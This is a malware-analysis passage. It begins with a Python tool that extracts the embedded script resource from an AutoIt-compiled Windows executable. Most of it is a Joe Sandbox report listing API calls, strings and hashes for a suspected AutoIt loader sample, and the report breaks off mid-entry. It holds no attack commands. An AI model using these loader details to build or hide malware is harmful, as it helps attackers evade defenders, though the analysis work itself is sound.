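    count = _u16(pe, d + 12) + _u16(pe, d + 14)   # NumberOfNamedEntries + NumberOfIdEntries
    for i in range(count):
        e = d + 16 + 8 * i
        ident, target = _u32(pe, e), _u32(pe, e + 4)
        if ident & 0x80000000:                     # high bit set: offset to a UTF-16 name string
            s = base + (ident & 0x7FFFFFFF)
            ident = pe[s + 2:s + 2 + 2 * _u16(pe, s)].decode("utf-16-le")
        yield ident, target & 0x7FFFFFFF, bool(target & 0x80000000)


def find_resource(pe, rtype=RT_RCDATA, name="SCRIPT"):
    """Return the bytes of the first language variant of resource (rtype, name), or None."""
    res_rva, secs = _resource_dir_and_sections(pe)
    if res_rva == 0:
        return None
    base = rva_to_offset(secs, res_rva)
    for t_id, t_off, t_sub in _entries(pe, base, 0):               # level 1: type
        if t_id != rtype or not t_sub:
            continue
        for n_id, n_off, n_sub in _entries(pe, base, t_off):       # level 2: name (case-insensitive)
            if not (isinstance(n_id, str) and n_id.upper() == name.upper()) or not n_sub:
                continue
            for _lang, d_off, l_sub in _entries(pe, base, n_off):  # level 3: language -> data entry
                if l_sub:
                    continue
                data_rva, size = _u32(pe, base + d_off), _u32(pe, base + d_off + 4)
                off = rva_to_offset(secs, data_rva)
                return bytes(pe[off:off + size])
    return None


def build_test_pe(payload, res_name="SCRIPT"):
    """Constructed minimal PE32 (no code, one .rsrc section) for offline testing only."""
    sec_rva, sec_off = 0x1000, 0x400
    name_u16 = res_name.encode("utf-16-le")
    type_dir, lang_dir, name_str = 24, 48, 72               # offsets inside the .rsrc section
    data_entry = (name_str + 2 + len(name_u16) + 3) & ~3
    rsrc = bytearray()
    rsrc += struct.pack("<IIHHHH", 0, 0, 0, 0, 0, 1)          # root: one ID entry (the type)
    rsrc += struct.pack("<II", RT_RCDATA, 0x80000000 | type_dir)
    rsrc += struct.pack("<IIHHHH", 0, 0, 0, 0, 1, 0)          # type dir: one named entry
    rsrc += struct.pack("<II", 0x80000000 | name_str, 0x80000000 | lang_dir)
    rsrc += struct.pack("<IIHHHH", 0, 0, 0, 0, 0, 1)          # name dir: language 0 -> data entry
    rsrc += struct.pack("<II", 0, data_entry)
    rsrc += struct.pack("<H", len(res_name)) + name_u16       # IMAGE_RESOURCE_DIR_STRING_U
    rsrc += b"\0" * (data_entry - len(rsrc))
    rsrc += struct.pack("<IIII", sec_rva + data_entry + 16, len(payload), 0, 0)
    rsrc += payload
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)      # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)
    dirs = [(0, 0)] * 16
    dirs[IMAGE_DIRECTORY_ENTRY_RESOURCE] = (sec_rva, len(rsrc))
    opt = struct.pack("<H", 0x10B) + b"\0" * 94 + b"".join(struct.pack("<II", *d) for d in dirs)
    sec = b".rsrc\0\0\0" + struct.pack("<IIIIIIHHI", len(rsrc), sec_rva, len(rsrc), sec_off, 0, 0, 0, 0, 0x40000040)
    hdr = dos + coff + opt + sec
    return hdr + b"\0" * (sec_off - len(hdr)) + bytes(rsrc)


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_test_pe(b"constructed blob")
    blob = find_resource(data)
    print("no RCDATA/SCRIPT resource" if blob is None else "SCRIPT resource: %d bytes" % len(blob))
```

Run with a path to a sample to report the resource size, or with no argument to exercise the constructed test image. The bytes returned are the raw resource exactly as the stub sees it after LockResource; decoding the AutoIt script format inside that blob is a separate step this example does not perform.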
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper
                                          • String ID:
                                          • API String ID: 3964851224-0
                                          • Opcode ID: 4bb4d6378120b73b8694f8fdc22545bf5ce0c4a8d2dfb30c99fd0af54ae32c52
                                          • Instruction ID: 1e6c664c8db06971b85d754c23974e1cf9455cdd3638a543c293dee175dc62a0
                                          • Opcode Fuzzy Hash: 4bb4d6378120b73b8694f8fdc22545bf5ce0c4a8d2dfb30c99fd0af54ae32c52
                                          • Instruction Fuzzy Hash: 0A925B706083459FD720DF14C480B6AB7E5BFC9304F14896DE89A9B392D7B6EC85CB92
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?,0093E398), ref: 0096446A
                                          • FindFirstFileW.KERNELBASE(?,?), ref: 0096447B
                                          • FindClose.KERNEL32(00000000), ref: 0096448B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: FileFind$AttributesCloseFirst
                                          • String ID:
                                          • API String ID: 48322524-0
                                          • Opcode ID: e11692719b09a3cd4879ee1572fccb195bfc9c34d13e55b6442cb4dff6b96aaf
                                          • Instruction ID: c8c7bb303fdea854309c93c4274b4676679346e3d3b604b5d681b2d7e0957393
                                          • Opcode Fuzzy Hash: e11692719b09a3cd4879ee1572fccb195bfc9c34d13e55b6442cb4dff6b96aaf
                                          • Instruction Fuzzy Hash: ACE0D8334245006B46106B78EC0E4E9779C9E45375F100716F835C11E0EB749900A696
                                          Strings
                                          • Variable must be of type 'Object'., xrefs: 00943E62
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Variable must be of type 'Object'.
                                          • API String ID: 0-109567571
                                          • Opcode ID: 785f019c4d581ebb8af895bb838dea54113b3e728fca58fd1c89774761f6351b
                                          • Instruction ID: 7916cec20e15cc15d370e81ebef83efa8536c149b4df43628c5c89457c7c980e
                                          • Opcode Fuzzy Hash: 785f019c4d581ebb8af895bb838dea54113b3e728fca58fd1c89774761f6351b
                                          • Instruction Fuzzy Hash: 2DA2AC75E04219CFCB24CF58C490AAEB7B6FF58314F248869E916AB391D735ED42CB90
                                          APIs
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00910A5B
                                          • timeGetTime.WINMM ref: 00910D16
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00910E53
                                          • Sleep.KERNEL32(0000000A), ref: 00910E61
                                          • LockWindowUpdate.USER32(00000000,?,?), ref: 00910EFA
                                          • DestroyWindow.USER32 ref: 00910F06
                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00910F20
                                          • Sleep.KERNEL32(0000000A,?,?), ref: 00944E83
                                          • TranslateMessage.USER32(?), ref: 00945C60
                                          • DispatchMessageW.USER32(?), ref: 00945C6E
                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00945C82
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                          • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                          • API String ID: 4212290369-3242690629
                                          • Opcode ID: a76eed1fea8b4d2998a5d675daf00f1764ab8c4825632158c201cfe3d0c08bff
                                          • Instruction ID: 0a06384bb70c38050676e2eee668aa041d82f4311b77b0754a782d27a65cddd9
                                          • Opcode Fuzzy Hash: a76eed1fea8b4d2998a5d675daf00f1764ab8c4825632158c201cfe3d0c08bff
                                          • Instruction Fuzzy Hash: F7B2D170608745DFD724DF64C884FAAB7E8BFC4304F15491DE49A972A2DBB5E884CB82

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00968F5F: __time64.LIBCMT ref: 00968F69
                                            • Part of subcall function 00904EE5: _fseek.LIBCMT ref: 00904EFD
                                          • __wsplitpath.LIBCMT ref: 00969234
                                            • Part of subcall function 009240FB: __wsplitpath_helper.LIBCMT ref: 0092413B
                                          • _wcscpy.LIBCMT ref: 00969247
                                          • _wcscat.LIBCMT ref: 0096925A
                                          • __wsplitpath.LIBCMT ref: 0096927F
                                          • _wcscat.LIBCMT ref: 00969295
                                          • _wcscat.LIBCMT ref: 009692A8
                                            • Part of subcall function 00968FA5: _memmove.LIBCMT ref: 00968FDE
                                            • Part of subcall function 00968FA5: _memmove.LIBCMT ref: 00968FED
                                          • _wcscmp.LIBCMT ref: 009691EF
                                            • Part of subcall function 00969734: _wcscmp.LIBCMT ref: 00969824
                                            • Part of subcall function 00969734: _wcscmp.LIBCMT ref: 00969837
                                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00969452
                                          • _wcsncpy.LIBCMT ref: 009694C5
                                          • DeleteFileW.KERNEL32(?,?), ref: 009694FB
                                          • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00969511
                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00969522
                                          • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00969534
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                          • String ID:
                                          • API String ID: 1500180987-0
                                          • Opcode ID: 8b6055cc7cbc71ab22c586df1fe5163bd196a417169dd27f7df38fcb8eaaa8a5
                                          • Instruction ID: 8f38e37cf6a8a496b9e1ffbb09a74450b9770307cc0bf58dd7bc964134270ce8
                                          • Opcode Fuzzy Hash: 8b6055cc7cbc71ab22c586df1fe5163bd196a417169dd27f7df38fcb8eaaa8a5
                                          • Instruction Fuzzy Hash: 8AC12BB1D00229AEDF21DF95CC85ADEB7BDAF85310F0040AAF609E6251DB309A858F65

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 00903074
                                          • RegisterClassExW.USER32(00000030), ref: 0090309E
                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009030AF
                                          • InitCommonControlsEx.COMCTL32(?), ref: 009030CC
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009030DC
                                          • LoadIconW.USER32(000000A9), ref: 009030F2
                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00903101
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                          • API String ID: 2914291525-1005189915
                                          • Opcode ID: af67d883a157063cebe034b1e30aaac0f470dd6b52fd7ae3d3c555e941181754
                                          • Instruction ID: 2530ae24763e5db144550ab3dae87bf8a6862a06acc79c8cc5c35c2aafd5a798
                                          • Opcode Fuzzy Hash: af67d883a157063cebe034b1e30aaac0f470dd6b52fd7ae3d3c555e941181754
                                          • Instruction Fuzzy Hash: 7A3147B1869349AFDB10CFA4EC88A8DBBF0FB08310F14452EE580E62A0D7B91585DF51

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 00903074
                                          • RegisterClassExW.USER32(00000030), ref: 0090309E
                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009030AF
                                          • InitCommonControlsEx.COMCTL32(?), ref: 009030CC
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009030DC
                                          • LoadIconW.USER32(000000A9), ref: 009030F2
                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00903101
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                          • API String ID: 2914291525-1005189915
                                          • Opcode ID: 700c21b2831df1ed2e2009a263c3b99e270f55a99caced4fd26e113853ea397f
                                          • Instruction ID: be950098e94e53055bc250c19dd4325ebe50229326f88131538d2acca3dfea9d
                                          • Opcode Fuzzy Hash: 700c21b2831df1ed2e2009a263c3b99e270f55a99caced4fd26e113853ea397f
                                          • Instruction Fuzzy Hash: 4521C7B1D25318AFEB00DFA4EC59B9DBBF4FB08710F10512AF511A63A0D7B15584AF91

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00904706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009C52F8,?,009037AE,?), ref: 00904724
                                            • Part of subcall function 0092050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00907165), ref: 0092052D
                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 009071A8
                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0093E8C8
                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0093E909
                                          • RegCloseKey.ADVAPI32(?), ref: 0093E947
                                          • _wcscat.LIBCMT ref: 0093E9A0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                          • API String ID: 2673923337-2727554177
                                          • Opcode ID: 4d42abb2dc067e41da9dc82e711dacf0087b6532fbb0c3c7036778c3cd03ecd3
                                          • Instruction ID: 45b446badafec6114d1082686f3fd1c57aeb14ade250ea6f6c3c555f1ee3e92c
                                          • Opcode Fuzzy Hash: 4d42abb2dc067e41da9dc82e711dacf0087b6532fbb0c3c7036778c3cd03ecd3
                                          • Instruction Fuzzy Hash: 48717D71918301AEC700EF69E841E6BBBE8FF85350F40092EF455C72E1EB71A948DB52

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 00903A50
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00903A5F
                                          • LoadIconW.USER32(00000063), ref: 00903A76
                                          • LoadIconW.USER32(000000A4), ref: 00903A88
                                          • LoadIconW.USER32(000000A2), ref: 00903A9A
                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00903AC0
                                          • RegisterClassExW.USER32(?), ref: 00903B16
                                            • Part of subcall function 00903041: GetSysColorBrush.USER32(0000000F), ref: 00903074
                                            • Part of subcall function 00903041: RegisterClassExW.USER32(00000030), ref: 0090309E
                                            • Part of subcall function 00903041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 009030AF
                                            • Part of subcall function 00903041: InitCommonControlsEx.COMCTL32(?), ref: 009030CC
                                            • Part of subcall function 00903041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 009030DC
                                            • Part of subcall function 00903041: LoadIconW.USER32(000000A9), ref: 009030F2
                                            • Part of subcall function 00903041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00903101
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                          • String ID: #$0$AutoIt v3
                                          • API String ID: 423443420-4155596026
                                          • Opcode ID: 0fe9759e85ab0103f815ecdc0ac7f80ecf38b52b77733fafe07925c783c93f6a
                                          • Instruction ID: 03e98f1c0dee34aeb62fa1a657242bbd00d0c7df59bf81e98e724aa6398ccc1e
                                          • Opcode Fuzzy Hash: 0fe9759e85ab0103f815ecdc0ac7f80ecf38b52b77733fafe07925c783c93f6a
                                          • Instruction Fuzzy Hash: EF214870D29308AFEB10DFA4EC19F9D7BF4FB08711F11412AE510A62B1D3B56690AF84

                                          Control-flow Graph

                                          APIs
                                          • DefWindowProcW.USER32(?,?,?,?), ref: 009036D2
                                          • KillTimer.USER32(?,00000001), ref: 009036FC
                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0090371F
                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0090372A
                                          • CreatePopupMenu.USER32 ref: 0090373E
                                          • PostQuitMessage.USER32(00000000), ref: 0090374D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                          • String ID: TaskbarCreated
                                          • API String ID: 129472671-2362178303
                                          • Opcode ID: 1afd7b9dfa073285b317083ccb42604803f068c1a65e35ba6b9fcb3b5cce5f62
                                          • Instruction ID: 3166e24d33484764dc6df46cf428c86e4304e3d10f7253e887020d1e9dd7f3b3
                                          • Opcode Fuzzy Hash: 1afd7b9dfa073285b317083ccb42604803f068c1a65e35ba6b9fcb3b5cce5f62
                                          • Instruction Fuzzy Hash: 1F415BB2628509BFDB245F78EC1AF7937DDEB44300F504529F602D62E1CA66AE80A761

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                          • API String ID: 1825951767-3513169116
                                          • Opcode ID: b443e3c83219bc1071f8ad282c4020eb0780a1f535310340f5c948fa84ec8507
                                          • Instruction ID: 8bddfe552c9cfeb4fdc095bdf7bdb2861028e784cd41802280883e53f5bcd20b
                                          • Opcode Fuzzy Hash: b443e3c83219bc1071f8ad282c4020eb0780a1f535310340f5c948fa84ec8507
                                          • Instruction Fuzzy Hash: 5BA13A72D1422D9ECB04EBA4DC91EEEB7BCBF94310F404529E426A71D1EB746A08CB60

                                          Control-flow Graph

                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01272911
                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01272B37
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1460293219.0000000001270000.00000040.00000020.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1270000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: CreateFileFreeVirtual
                                          • String ID:
                                          • API String ID: 204039940-0
                                          • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                          • Instruction ID: 8e85ec85d207d71d84015ac09c8ce221e6b64232a0adb9a4fafc53f57e854a13
                                          • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                          • Instruction Fuzzy Hash: E6A13A70E10209EBDB24DFA4C995BEEBBB5FF48304F208159E601BB281D7759A81CF94

                                          Control-flow Graph (rendered as an image on the original page; node list summarized here)
                                          • Single block 9039d5-903a45: CreateWindowExW * 2, ShowWindow * 2
                                          APIs
                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00903A03
                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00903A24
                                          • ShowWindow.USER32(00000000,?,?), ref: 00903A38
                                          • ShowWindow.USER32(00000000,?,?), ref: 00903A41
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Window$CreateShow
                                          • String ID: AutoIt v3$edit
                                          • API String ID: 1584632944-3779509399
                                          • Opcode ID: 0476a162c03b4a59885d22bc41b9ed71b6edebfd45043320f7673e79cb65d11c
                                          • Instruction ID: b051ab742e1dc0575f08ff641a01d46dce491d858cfc5b05b22dd4fb084119cc
                                          • Opcode Fuzzy Hash: 0476a162c03b4a59885d22bc41b9ed71b6edebfd45043320f7673e79cb65d11c
                                          • Instruction Fuzzy Hash: 38F03A709256907EEB306723AC58E2B2EBDD7C6F50B02002AB910A2270C2712881EAB0

                                          Control-flow Graph (rendered as an image on the original page; node list summarized here)
                                          • Blocks 12725e0-12727f3, entry block 12725e0-1272737 (call 1270230, call 12724d0)
                                          • Subroutine calls: 1270230, 12724d0, 1272510, 12714d0, 1272560
                                          • API calls: CreateFileW (12725e0), VirtualAlloc (1272755), ReadFile (1272773), ExitProcess (12727e4)
                                          • Every failure edge (1272739, 1272750, 1272771, 127278c) and the ExitProcess block lead to the final block 12727ee-12727f3
                                          APIs
                                            • Part of subcall function 012724D0: Sleep.KERNELBASE(000001F4), ref: 012724E1
                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0127272D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1460293219.0000000001270000.00000040.00000020.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1270000_Gz2FxKx2cM.jbxd
                                          Similarity
